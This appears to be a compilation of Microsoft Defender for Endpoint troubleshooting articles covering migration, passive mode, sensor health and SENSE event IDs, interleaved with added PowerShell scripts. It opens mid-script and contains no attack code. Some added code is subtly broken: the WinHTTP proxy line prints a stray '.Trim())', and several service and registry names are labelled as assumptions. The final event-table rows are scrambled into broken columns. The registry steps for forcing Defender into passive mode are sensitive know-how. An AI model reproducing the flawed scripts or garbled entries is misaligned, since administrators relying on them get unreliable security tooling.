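# The platform version and DisableLocalAdminMerge checks use the Defender PowerShell module
# (Get-MpComputerStatus / Get-MpPreference) to cover the requirements in step 1.

function Test-TamperProtectedExclusions {
    $defenderKey = 'HKLM:\SOFTWARE\Microsoft\Windows Defender'

    # Step 2: 6 = Intune only, 7 = co-managed (exclusions not protected).
    $productType = (Get-ItemProperty -Path $defenderKey -Name ManagedDefenderProductType `
                        -ErrorAction SilentlyContinue).ManagedDefenderProductType
    # Step 3: 1 = exclusions are tamper protected, 0 = not.
    $tpExclusions = (Get-ItemProperty -Path "$defenderKey\Features" -Name TPExclusions `
                        -ErrorAction SilentlyContinue).TPExclusions

    # Step 1 requirements that can be read locally.
    $status = Get-MpComputerStatus -ErrorAction SilentlyContinue
    $pref   = Get-MpPreference -ErrorAction SilentlyContinue
    $platformVersion = $null
    $platformOk = $false
    if ($status -and $status.AMProductVersion) {
        $platformVersion = $status.AMProductVersion
        $platformOk = [version]$platformVersion -ge [version]'4.18.2211.5'
    }
    $adminMergeDisabled = [bool]($pref -and $pref.DisableLocalAdminMerge)

    if ($productType -eq 6)         { $management = 'Intune only' }
    elseif ($productType -eq 7)     { $management = 'Co-managed (Intune and Configuration Manager)' }
    elseif ($null -eq $productType) { $management = 'ManagedDefenderProductType not present' }
    else                            { $management = "Unrecognized value $productType" }

    [pscustomobject]@{
        PlatformVersion            = $platformVersion
        PlatformMeetsMinimum       = $platformOk
        DisableLocalAdminMerge     = $adminMergeDisabled
        ManagedDefenderProductType = $productType
        Management                 = $management
        TPExclusions               = $tpExclusions
        # Exclusions are protected only when the device is Intune-only and TPExclusions is 1.
        ExclusionsTamperProtected  = ($productType -eq 6 -and $tpExclusions -eq 1)
    }
}

Test-TamperProtectedExclusions | Format-List
```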



Troubleshooting issues when migrating
to Microsoft Defender for Endpoint
Article • 04/24/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

This article provides troubleshooting information for security administrators who are
experiencing issues when moving from a non-Microsoft endpoint protection solution to
Microsoft Defender for Endpoint.

Microsoft Defender Antivirus is getting uninstalled on Windows Server

When you migrate to Defender for Endpoint, you begin with your non-Microsoft
antivirus/antimalware protection in active mode. As part of the setup process, you
configure Microsoft Defender Antivirus in passive mode. Occasionally, your non-
Microsoft antivirus/antimalware solution might prevent Microsoft Defender Antivirus
from running on Windows Server. In fact, it can look like Microsoft Defender Antivirus
has been removed from Windows Server.

To resolve this issue, take the following steps:

1. Add Microsoft Defender for Endpoint to the exclusion list.

2. Set Microsoft Defender Antivirus to passive mode manually.

Add Microsoft Defender for Endpoint to the exclusion list

OS: Windows 11; Windows 10, version 1803 or later (See Windows 10 release information); Windows 10, version 1703 or 1709 with KB4493441 installed
Exclusions:
C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe
C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe
C:\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe
C:\Program Files\Windows Defender Advanced Threat Protection\SenseCM.exe
C:\Program Files\Windows Defender Advanced Threat Protection\SenseNdr.exe
C:\Program Files\Windows Defender Advanced Threat Protection\SenseSC.exe
C:\Program Files\Windows Defender Advanced Threat Protection\Classification\SenseCE.exe
C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection

OS: Windows Server 2022; Windows Server 2019; Windows Server 2016; Windows Server 2012 R2; Windows Server, version 1803
Exclusions:
On Windows Server 2012 R2 and Windows Server 2016 running the modern, unified solution, the following exclusions are required after updating the Sense EDR component using KB5005292:
C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\*\MsSense.exe
C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\*\SenseCnCProxy.exe
C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\*\SenseIR.exe
C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\*\SenseCE.exe
C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\*\SenseSampleUploader.exe
C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\*\SenseCM.exe
C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection

OS: Windows 8.1; Windows 7; Windows Server 2008 R2 SP1
Exclusions:
C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\Monitoring Host Temporary Files 6\45\MsSenseS.exe
NOTE: Monitoring Host Temporary Files 6\45 can be different numbered subfolders.
C:\Program Files\Microsoft Monitoring Agent\Agent\AgentControlPanel.exe
C:\Program Files\Microsoft Monitoring Agent\Agent\HealthService.exe
C:\Program Files\Microsoft Monitoring Agent\Agent\HSLockdown.exe
C:\Program Files\Microsoft Monitoring Agent\Agent\MOMPerfSnapshotHelper.exe
C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe
C:\Program Files\Microsoft Monitoring Agent\Agent\TestCloudConnection.exe

Important

As a best practice, keep your organization's devices and endpoints up to date.
Make sure to get the latest updates for Microsoft Defender for Endpoint and
Microsoft Defender Antivirus, and keep your organization's operating systems and
productivity apps up to date.

Set Microsoft Defender Antivirus to passive mode manually

On Windows Server 2022, Windows Server 2019, Windows Server, version 1803 or
newer, Windows Server 2016, or Windows Server 2012 R2, you must set Microsoft
Defender Antivirus to passive mode manually. This action helps prevent problems
caused by having multiple antivirus products installed on a server. You can set Microsoft
Defender Antivirus to passive mode using PowerShell, Group Policy, or a registry key.

You can set Microsoft Defender Antivirus to passive mode by setting the following
registry key:
Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection

Name: ForceDefenderPassiveMode

Type: REG_DWORD

Value: 1

Note

For passive mode to work on endpoints running Windows Server 2016 and
Windows Server 2012 R2, those endpoints must be onboarded using the
instructions in Onboard Windows servers.

For more information, see Microsoft Defender Antivirus in Windows.

Microsoft Defender Antivirus seems to be stuck in passive mode

If Microsoft Defender Antivirus is stuck in passive mode, set it to active mode manually
by following these steps:

1. On your Windows device, open Registry Editor as an administrator.

2. Go to Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection.

3. Set or define a REG_DWORD entry called ForceDefenderPassiveMode, and set its value to 0.

4. Reboot the device.
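Both procedures above (forcing passive mode on a server, and clearing the value when Defender Antivirus is stuck in passive mode) come down to writing the same ForceDefenderPassiveMode DWORD and then confirming the resulting run mode. The following PowerShell is an added example, not code from the Microsoft documentation; the function names are the example's own, and it assumes the Get-MpComputerStatus cmdlet exposes an AMRunningMode property, which current Defender platform builds do. Run it in an elevated session.

```powershell
# Added example: set or clear ForceDefenderPassiveMode and report the antivirus run mode.
# Registry path and value semantics (1 = passive, 0 = active) are those given in the article.
$regPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection'

function Set-DefenderPassiveMode {
    param([Parameter(Mandatory)][bool]$Enabled)
    if (-not (Test-Path $regPath)) {
        New-Item -Path $regPath -Force | Out-Null
    }
    # [int]$true is 1, [int]$false is 0, matching the documented values.
    New-ItemProperty -Path $regPath -Name 'ForceDefenderPassiveMode' `
        -PropertyType DWord -Value ([int]$Enabled) -Force | Out-Null
}

function Get-DefenderRunMode {
    # Assumption: AMRunningMode reports 'Normal', 'Passive Mode', 'EDR Block Mode',
    # 'SxS Passive Mode' or 'Not running' on current Defender platform builds.
    $status = Get-MpComputerStatus
    $policy = Get-ItemProperty -Path $regPath -Name 'ForceDefenderPassiveMode' -ErrorAction SilentlyContinue
    [pscustomobject]@{
        ForceDefenderPassiveMode  = if ($policy) { $policy.ForceDefenderPassiveMode } else { '<not set>' }
        AMRunningMode             = $status.AMRunningMode
        AMServiceEnabled          = $status.AMServiceEnabled
        RealTimeProtectionEnabled = $status.RealTimeProtectionEnabled
    }
}

# Usage: force passive mode on a server that runs a non-Microsoft antivirus product ...
Set-DefenderPassiveMode -Enabled $true
# ... or clear it when Defender Antivirus is stuck in passive mode and should be active again:
# Set-DefenderPassiveMode -Enabled $false

# Before and after the reboot the article calls for, check what the engine reports.
Get-DefenderRunMode
```

If AMRunningMode still disagrees with the registry value after a restart, the device is in the "stuck in passive mode" situation the article describes and the next step is the support route it names; on Windows Server 2016 and 2012 R2 also confirm the device was onboarded with the Onboard Windows servers instructions, since passive mode is not honoured there otherwise.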

) Important

If you're still having trouble setting Microsoft Defender Antivirus to active mode
after following this procedure, contact support.

I am having trouble re-enabling Microsoft Defender Antivirus on Windows Server 2016
If you are using a non-Microsoft antivirus/antimalware solution on Windows Server
2016, your existing solution might have required Microsoft Defender Antivirus to be
disabled or uninstalled. You can use the Malware Protection Command-Line Utility to re-
enable Microsoft Defender Antivirus on Windows Server 2016.

1. As a local administrator on the server, open Command Prompt.

2. Run the following command: MpCmdRun.exe -wdenable

3. Restart the device.

See also
Microsoft Defender Antivirus compatibility with other security products

Onboarding tools and methods for Windows devices in Defender for Endpoint

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Check service health at Microsoft Defender for Endpoint
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

The Device health tile provides information on the individual device's ability to provide
sensor data and communicate with the Defender for Endpoint service. It reports how
many devices require attention and helps you identify problematic devices and take
action to correct known issues.

There are two status indicators on the tile that provide information on the number of
devices that aren't reporting properly to the service:

Misconfigured - These devices might partially be reporting sensor data to the Defender for Endpoint service and might have configuration errors that need to be corrected.
Inactive - Devices that have stopped reporting to the Defender for Endpoint service for more than seven days in the past month.

Clicking any of the groups directs you to Device inventory, filtered according to your
choice.

On Device inventory, you can filter the health state list by the following status:

Active - Devices that are actively reporting to the Defender for Endpoint service.
Misconfigured - These devices might partially be reporting sensor data to the Defender for Endpoint service but have configuration errors that need to be corrected. Misconfigured devices can have one or a combination of the following issues:
    No sensor data - The device has stopped sending sensor data. Only limited alerts can be triggered from the device.
    Impaired communications - The ability to communicate with the device is impaired. Sending files for deep analysis, blocking files, isolating the device from the network, and other actions that require communication with the device might not work.
Inactive - Devices that have stopped reporting to the Defender for Endpoint service.

You can also download the entire list in CSV format using the Export feature. For more
information on filters, see View and organize the Devices list.

7 Note

Export the list in CSV format to display the unfiltered data. The CSV file will include
all devices in the organization, regardless of any filtering applied in the view itself
and can take a significant amount of time to download, depending on how large
your organization is.

You can view the device details when you click on a misconfigured or inactive device.

See also
Fix unhealthy sensors in Defender for Endpoint
Client analyzer overview
Download and run the client analyzer
Run the client analyzer on Windows
Run the client analyzer on macOS or Linux
Data collection for advanced troubleshooting on Windows


Fix unhealthy sensors in Microsoft Defender for Endpoint
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Devices are categorized as misconfigured or inactive for varying causes. This section explains what might have caused a device to be categorized as inactive or misconfigured.

Inactive devices
An inactive device isn't necessarily flagged because of an issue. The following actions taken on a device can cause it to be categorized as inactive:

Device isn't in use
Device was reinstalled or renamed
Device was offboarded
Device isn't sending signals

Device isn't in use

Any device that isn't in use for more than seven days retains 'Inactive' status in the portal.

Device was reinstalled or renamed

A new device entity is generated in Microsoft Defender XDR for reinstalled or renamed devices. The previous device entity remains, with an 'Inactive' status in the portal. If you reinstalled a device and deployed the Defender for Endpoint package, search for the new device name to verify that the device is reporting normally.

Device was offboarded

If the device was offboarded, it still appears in the device list. After seven days, the device health state should change to inactive.

Device isn't sending signals

If the device isn't sending any signals to any Microsoft Defender for Endpoint channels for more than seven days, for any reason, the device can be considered inactive; this includes conditions that fall under the misconfigured devices classification.

Do you expect a device to be in 'Active' status? Open a support ticket.

Misconfigured devices
Misconfigured devices can further be classified as:

Impaired communications
No sensor data

Impaired communications
This status indicates that there's limited communication between the device and the service.

The following suggested actions can help fix issues related to a misconfigured device with impaired communications:

Ensure the device has an Internet connection

The Microsoft Defender for Endpoint sensor requires Microsoft Windows HTTP (WinHTTP) to report sensor data and communicate with the Microsoft Defender for Endpoint service. WinHTTP has its own system-wide proxy configuration, separate from the per-user browser settings, so a browser that reaches the Internet from the device doesn't prove that the sensor can.

Verify client connectivity to Microsoft Defender for Endpoint service URLs

Verify that the proxy configuration completed successfully, that WinHTTP can discover and communicate through the proxy server in your environment, and that the proxy server allows traffic to the Microsoft Defender for Endpoint service URLs.

If you took corrective actions and the device status is still misconfigured, open a support ticket.

No sensor data
A misconfigured device with status 'No sensor data' has communication with the service but can only report partial sensor data.

Follow these actions to correct known issues related to a misconfigured device with status 'No sensor data':

Ensure the device has an Internet connection

The Microsoft Defender for Endpoint sensor requires Microsoft Windows HTTP (WinHTTP) to report sensor data and communicate with the Microsoft Defender for Endpoint service.

Verify client connectivity to Microsoft Defender for Endpoint service URLs

Verify that the proxy configuration completed successfully, that WinHTTP can discover and communicate through the proxy server in your environment, and that the proxy server allows traffic to the Microsoft Defender for Endpoint service URLs.

Ensure the diagnostic data service is enabled

If the devices aren't reporting correctly, verify that the Windows diagnostic data service (Connected User Experiences and Telemetry) is set to start automatically, and that it's running on the endpoint.

Ensure that Microsoft Defender Antivirus isn't disabled by policy

If your devices are running a third-party antimalware client, the Defender for Endpoint agent still requires that the Microsoft Defender Antivirus Early Launch Antimalware (ELAM) driver is enabled.

If you took corrective actions and the device status is still misconfigured, open a support ticket.
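The checks listed under "Impaired communications" and "No sensor data" above can be run locally before a support ticket is opened. The following PowerShell is an added example, not part of the Microsoft documentation or the client analyzer; it assumes the sensor runs as the Sense service, the diagnostic data service is DiagTrack, the Defender Antivirus ELAM driver is registered as the WdBoot kernel service, and the sensor records its onboarding state in HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status (OnboardingState = 1). Run it as an administrator on the affected device.

```powershell
# Added example: local pre-checks for the misconfigured-device causes described above.
function Test-SenseHealth {
    $findings = [System.Collections.Generic.List[string]]::new()

    # 1. The sensor service itself. Assumption: service name is 'Sense'.
    $sense = Get-Service -Name Sense -ErrorAction SilentlyContinue
    if (-not $sense) {
        $findings.Add('Sense service not installed: device is not onboarded')
    } elseif ($sense.Status -ne 'Running') {
        $findings.Add("Sense service is $($sense.Status), expected Running")
    }

    # 2. Windows diagnostic data service (Connected User Experiences and Telemetry).
    #    Assumption: service name is 'DiagTrack'. Must start automatically and be running.
    $diag = Get-CimInstance Win32_Service -Filter "Name='DiagTrack'"
    if (-not $diag) {
        $findings.Add('DiagTrack service not found')
    } else {
        if ($diag.StartMode -ne 'Auto')  { $findings.Add("DiagTrack start mode is $($diag.StartMode), expected Auto") }
        if ($diag.State     -ne 'Running') { $findings.Add("DiagTrack is $($diag.State), expected Running") }
    }

    # 3. Defender Antivirus ELAM driver. Assumption: registered as 'WdBoot';
    #    Start = 0 (SERVICE_BOOT_START) means the driver is enabled.
    $elam = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\WdBoot' -Name Start -ErrorAction SilentlyContinue
    if (-not $elam) {
        $findings.Add('WdBoot (Defender ELAM) driver entry missing')
    } elseif ($elam.Start -ne 0) {
        $findings.Add("WdBoot start type is $($elam.Start); ELAM driver appears disabled by policy")
    }

    # 4. Onboarding state recorded by the sensor. Assumption: OnboardingState = 1 when onboarded.
    $state = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status' `
        -Name OnboardingState -ErrorAction SilentlyContinue
    if (-not $state -or $state.OnboardingState -ne 1) {
        $findings.Add('OnboardingState is not 1; redeploy the onboarding package')
    }

    # 5. WinHTTP proxy. The sensor uses WinHTTP, so this, not the browser proxy, is what matters.
    $proxy = (netsh winhttp show proxy) -join ' '
    $findings.Add("WinHTTP proxy: $($proxy -replace '\s+', ' ').Trim())")

    return $findings
}

Test-SenseHealth
```

Anything the function reports besides the WinHTTP line maps directly to one of the remedies above (redeploy onboarding, set DiagTrack to automatic and start it, re-enable the ELAM driver). Reachability of the service URLs themselves is outside this script, because the URL list isn't on this page; use the client analyzer linked under See also for that part.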

See also
Check sensor health state in Microsoft Defender for Endpoint
Client analyzer overview
Download and run the client analyzer
Run the client analyzer on Windows
Run the client analyzer on macOS or Linux
Data collection for advanced troubleshooting on Windows

Review events and errors using Event Viewer
Article • 10/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

View events in the Defender for Endpoint service event log
You can review event IDs in the Event Viewer on individual devices. This can help when, for example, a
device isn't appearing in the Devices list. In this scenario, you can look for event IDs on the device and
then use the table below to determine further troubleshooting steps based on the corresponding
event ID.

To open the Defender for Endpoint service event log:

1. Select Start on the Windows menu, type Event Viewer, and press Enter to open the Event Viewer.

2. In the log list, under Log Summary, scroll until you see Microsoft-Windows-SENSE/Operational.
Double-click the item to open the log.

You can also access the log by expanding Applications and Services Logs > Microsoft >
Windows > SENSE and selecting Operational.

7 Note

SENSE is the internal name used to refer to the behavioral sensor that powers Microsoft
Defender for Endpoint.

3. Events recorded by the service appear in the log.
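The same log can be read from PowerShell, which is faster than Event Viewer when a device is missing from the Devices list and you want to see at a glance which event IDs fired. The following is an added example, not part of the Microsoft documentation; the function name is the example's own, and the list of IDs that warrant action is transcribed from the table that follows (every ID whose Action column says more than "no action required"; event 8 is included because it needs a reboot when raised during offboarding).

```powershell
# Added example: summarize recent SENSE events by ID and flag the ones the table marks as actionable.
$log = 'Microsoft-Windows-SENSE/Operational'

# Transcribed from the table below; adjust if you treat some of these as informational.
$actionRequired = @(3, 5, 6, 7, 8, 9, 10, 12, 15, 17, 19, 20, 25, 26, 27, 28, 29, 30,
                    31, 32, 33, 34, 42, 43, 45, 48, 49, 51, 52)

function Get-SenseEventSummary {
    param([int]$Hours = 24)

    $events = Get-WinEvent -FilterHashtable @{
        LogName   = $log
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue

    if (-not $events) {
        Write-Warning "No events in $log for the last $Hours hours (is the device onboarded?)"
        return
    }

    $events | Group-Object Id | ForEach-Object {
        $id     = [int]$_.Name
        $latest = $_.Group | Sort-Object TimeCreated -Descending | Select-Object -First 1
        [pscustomobject]@{
            Id            = $id
            Count         = $_.Count
            NeedsAction   = $id -in $actionRequired
            LastSeen      = $latest.TimeCreated
            LatestMessage = ($latest.Message -split "`r?`n")[0]   # first line only
        }
    } | Sort-Object @{ Expression = 'NeedsAction'; Descending = $true }, Id
}

# Usage: review the last day, then pull the full text for an ID that needs action
Get-SenseEventSummary -Hours 24 | Format-Table -AutoSize
# Get-WinEvent -FilterHashtable @{ LogName = $log; Id = 5 } -MaxEvents 5 | Format-List TimeCreated, Message
```

Event 5 and event 15 carry the URL the sensor could not reach in the message text, which is the value to test through the WinHTTP proxy; a run that shows only 1, 4, 11, 13 and the 35 to 41 range is the healthy baseline.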

See the following table for a list of events recorded by the service.

Event ID 1
Message: Microsoft Defender for Endpoint service started (Version variable).
Description: Occurs during system startup, shut down, and during onboarding.
Action: Normal operating notification; no action required.

Event ID 2
Message: Microsoft Defender for Endpoint service shutdown.
Description: Occurs when the device is shut down or offboarded.
Action: Normal operating notification; no action required.

Event ID 3
Message: Microsoft Defender for Endpoint service failed to start. Failure code: variable.
Description: Service didn't start.
Action: Review other messages to determine possible cause and troubleshooting steps.

Event ID 4
Message: Microsoft Defender for Endpoint service contacted the server at variable.
Description: Variable = URL of the Defender for Endpoint processing servers. This URL matches that seen in the firewall or network activity.
Action: Normal operating notification; no action required.

Event ID 5
Message: Microsoft Defender for Endpoint service failed to connect to the server at variable.
Description: Variable = URL of the Defender for Endpoint processing servers. The service couldn't contact the external processing servers at that URL.
Action: Check the connection to the URL. See Configure proxy and Internet connectivity.

Event ID 6
Message: Microsoft Defender for Endpoint service isn't onboarded and no onboarding parameters were found.
Description: The device didn't onboard correctly and isn't reporting to the portal.
Action: Onboarding must be run before starting the service. Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. See Onboard Windows client devices.

Event ID 7
Message: Microsoft Defender for Endpoint service failed to read the onboarding parameters. Failure: variable.
Description: Variable = detailed error description. The device didn't onboard correctly and isn't reporting to the portal.
Action: Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. See Onboard Windows client devices.

Event ID 8
Message: Microsoft Defender for Endpoint service failed to clean its configuration. Failure code: variable.
Description: During onboarding: The service failed to clean its configuration during the onboarding. The onboarding process continues. During offboarding: The service failed to clean its configuration during the offboarding. The offboarding process finished but the service keeps running.
Action: Onboarding: No action required. Offboarding: Reboot the system. See Onboard Windows client devices.

Event ID 9
Message: Microsoft Defender for Endpoint service failed to change its start type. Failure code: variable.
Description: During onboarding: The device didn't onboard correctly and isn't reporting to the portal. During offboarding: Failed to change the service start type. The offboarding process continues.
Action: Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. See Onboard Windows client devices.

Event ID 10
Message: Microsoft Defender for Endpoint service failed to persist the onboarding information. Failure code: variable.
Description: The device didn't onboard correctly and isn't reporting to the portal.
Action: Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. See Onboard Windows client devices.

Event ID 11
Message: Onboarding or reonboarding of Defender for Endpoint service completed.
Description: The device onboarded correctly.
Action: Normal operating notification; no action required. It might take several hours for the device to appear in the portal.

Event ID 12
Message: Microsoft Defender for Endpoint failed to apply the default configuration.
Description: Service was unable to apply the default configuration.
Action: This error should resolve after a short period of time.

Event ID 13
Message: Microsoft Defender for Endpoint device ID calculated: variable.
Description: Normal operating process.
Action: Normal operating notification; no action required.

Event ID 15
Message: Microsoft Defender for Endpoint can't start command channel with URL: variable.
Description: Variable = URL of the Defender for Endpoint processing servers. The service couldn't contact the external processing servers at that URL.
Action: Check the connection to the URL. See Configure proxy and Internet connectivity.

Event ID 17
Message: Microsoft Defender for Endpoint service failed to change the Connected User Experiences and Telemetry service location. Failure code: variable.
Description: An error occurred with the Windows telemetry service.
Action: Ensure the diagnostic data service is enabled. Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. See Onboard Windows client devices.

Event ID 18
Message: OOBE (Windows Welcome) is completed.
Description: Service will only start after any Windows updates have finished installing.
Action: Normal operating notification; no action required.

Event ID 19
Message: OOBE (Windows Welcome) hasn't yet completed.
Description: Service will only start after any Windows updates finish installing.
Action: Normal operating notification; no action required. If this error persists after a system restart, ensure all Windows updates have fully installed.

Event ID 20
Message: Can't wait for OOBE (Windows Welcome) to complete. Failure code: variable.
Description: Internal error.
Action: If this error persists after a system restart, ensure all Windows updates are installed.

Event ID 25
Message: Microsoft Defender for Endpoint service failed to reset health status in the registry. Failure code: variable.
Description: The device didn't onboard correctly. It reports to the portal; however, the service might not appear as registered in SCCM or the registry.
Action: Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. See Onboard Windows client devices.

Event ID 26
Message: Microsoft Defender for Endpoint service failed to set the onboarding status in the registry. Failure code: variable.
Description: The device didn't onboard correctly. It reports to the portal; however, the service might not appear as registered in SCCM or the registry.
Action: Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. See Onboard Windows client devices.

Event ID 27
Message: Microsoft Defender for Endpoint service failed to enable SENSE aware mode in Microsoft Defender Antivirus. Onboarding process failed. Failure code: variable.
Description: Normally, Microsoft Defender Antivirus enters a special passive state if another real-time antimalware product is running properly on the device, and the device is reporting to Defender for Endpoint.
Action: Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. See Onboard Windows client devices. Ensure real-time antimalware protection is running properly.

Event ID 28
Message: Microsoft Defender for Endpoint Connected User Experiences and Telemetry service registration failed. Failure code: variable.
Description: An error occurred with the Windows telemetry service.
Action: Ensure the diagnostic data service is enabled. Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. See Onboard Windows client devices.

Event ID 29
Message: Failed to read the offboarding parameters. Error type: %1, Error code: %2, Description: %3
Description: This event occurs when the system can't read the offboarding parameters.
Action: Ensure the device has Internet access, then run the entire offboarding process again. Ensure the offboarding package isn't expired.

Event ID 30
Message: Microsoft Defender for Endpoint service failed to disable SENSE aware mode in Microsoft Defender Antivirus. Failure code: variable.
Description: Normally, Microsoft Defender Antivirus enters a special passive state if another real-time antimalware product is running properly on the device, and the device is reporting to Defender for Endpoint.
Action: Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. See Onboard Windows client devices. Ensure real-time antimalware protection is running properly.

Event ID 31
Message: Microsoft Defender for Endpoint Connected User Experiences and Telemetry service unregistration failed. Failure code: variable.
Description: An error occurred with the Windows telemetry service during onboarding. The offboarding process continues.
Action: Check for errors with the Windows telemetry service.

Event ID 32
Message: Microsoft Defender for Endpoint service failed to request to stop itself after offboarding process. Failure code: %1
Description: An error occurred during offboarding.
Action: Reboot the device.

Event ID 33
Message: Microsoft Defender for Endpoint service failed to persist SENSE GUID. Failure code: variable.
Description: A unique identifier is used to represent each device that is reporting to the portal. If the identifier doesn't persist, the same device might appear twice in the portal.
Action: Check registry permissions on the device to ensure the service can update the registry.

Event ID 34
Message: Microsoft Defender for Endpoint service failed to add itself as a dependency on the Connected User Experiences and Telemetry service, causing onboarding process to fail. Failure code: variable.
Description: An error occurred with the Windows telemetry service.
Action: Ensure the diagnostic data service is enabled. Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. See Onboard Windows client devices.

Event ID 35
Message: Communication quotas are updated. Disk quota in MB: variable, daily upload quota in MB: variable
Description: Variable = disk quota in MB.
Action: Normal operating notification; no action required.

Event ID 36
Message: Microsoft Defender for Endpoint Connected User Experiences and Telemetry service registration succeeded. Completion code: variable.
Description: Registering Defender for Endpoint with the Connected User Experiences and Telemetry service completed successfully.
Action: Normal operating notification; no action required.

Event ID 37
Message: Microsoft Defender for Endpoint A module is about to exceed its quota. Module: %1, Quota: {%2} {%3}, Percentage of quota utilization: %4.
Description: The device is near its allocated quota of the current 24-hour window. It's about to be throttled.
Action: Normal operating notification; no action required.

Event ID 38
Message: Network connection is identified as low. Microsoft Defender for Endpoint contacts the server every %1 minutes. Metered connection: %2, internet available: %3, free network available: %4.
Description: The device is using a metered/paid network and contacts the server less frequently.
Action: Normal operating notification; no action required.

Event ID 39
Message: Network connection is identified as normal. Microsoft Defender for Endpoint contacts the server every %1 minutes. Metered connection: %2, internet available: %3, free network available: %4.
Description: The device isn't using a metered/paid connection and contacts the server as usual.
Action: Normal operating notification; no action required.

Event ID 40
Message: Battery state is identified as low. Microsoft Defender for Endpoint contacts the server every %1 minutes. Battery state: %2.
Description: The device has a low battery level and contacts the server less frequently.
Action: Normal operating notification; no action required.

Event ID 41
Message: Battery state is identified as normal. Microsoft Defender for Endpoint contacts the server every %1 minutes. Battery state: %2.
Description: The device doesn't have a low battery level and contacts the server as usual.
Action: Normal operating notification; no action required.

Event ID 42
Message: Microsoft Defender for Endpoint component failed to perform action. Component: %1, Action: %2, Exception Type: %3, Exception message: %4
Description: Internal error. The service failed to start.
Action: If this error persists, contact Support.

Event ID 43
Message: Microsoft Defender for Endpoint component failed to perform action. Component: %1, Action: %2, Exception Type: %3, Exception Error: %4, Exception message: %5
Description: Internal error. The service failed to start.
Action: If this error persists, contact Support.

Event ID 44
Message: Offboarding of Defender for Endpoint service completed.
Description: The service was offboarded.
Action: Normal operating notification; no action required.

Event ID 45
Message: Failed to register and to start the event trace session [%1]. Error code: %2
Description: An error occurred on service startup while creating the ETW session. This caused service start-up failure.
Action: If this error persists, contact Support.

Event ID 46
Message: Failed to register and start the event trace session [%1] due to lack of resources. Error code: %2. This is most likely because there are too many active event trace sessions. The service retries in 1 minute.
Description: An error occurred on service startup while creating the ETW session due to lack of resources. The service is running, but doesn't report sensor events until the ETW session starts.
Action: Normal operating notification; no action required. The service tries to start the session every minute.

Event ID 47
Message: Successfully registered and started the event trace session - recovered after previous failed attempts.
Description: This event follows the previous event after the ETW session is successfully started.
Action: Normal operating notification; no action required.

Event ID 48
Message: Failed to add a provider [%1] to event trace session [%2]. Error code: %3. This means that events from this provider aren't reported.
Description: Failed to add a provider to the ETW session. As a result, the provider's events aren't reported.
Action: Check the error code. If the error persists, contact Support.

Event ID 49
Message: Invalid cloud configuration command received and ignored. Version: %1, status: %2, error code: %3, message: %4
Description: Received an invalid configuration file from the cloud service that was ignored.
Action: If this error persists, contact Support.

Event ID 50
Message: New cloud configuration applied successfully. Version: %1.
Description: Successfully applied a new configuration from the cloud service.
Action: Normal operating notification; no action required.

Event ID 51
Message: New cloud configuration failed to apply, version: %1. Successfully applied the last known good configuration, version %2.
Description: Received a bad configuration file from the cloud service. The last known good configuration was applied successfully.
Action: If this error persists, contact Support.

Event ID 52
Message: New cloud configuration failed to apply, version: %1. Also failed to apply last known good configuration, version %2. Successfully applied the default configuration.
Description: Received a bad configuration file from the cloud service. Failed to apply the last known good configuration, and the default configuration was applied.
Action: The service will attempt to download a new configuration file within 5 minutes. If you don't see event 50, contact Support.

Event ID 53
Message: Cloud configuration loaded from persistent storage, version: %1.
Description: The configuration was loaded from persistent storage on service startup.
Action: Normal operating notification; no action required.

54 Global (per- If state = 0: Cyber-data Normal operating notification; no action required.


pattern) state reporting rule has reached its
changed. State: defined capping quota and
%1, pattern: %2 doesn't send more data until
the capping quota expires. If
state = 1: The capping quota
expired and the rule will
resume sending data.

55 Failed to create Failed to create the secure Reboot the device. If this error persists, contact Support.
the Secure ETW ETW logger.
autologger.
Failure code: %1

56 Failed to remove Failed to remove the secure Contact Support.


the Secure ETW ETW session on offboarding.
autologger.
Failure code: %1
Event Message Description Action
ID

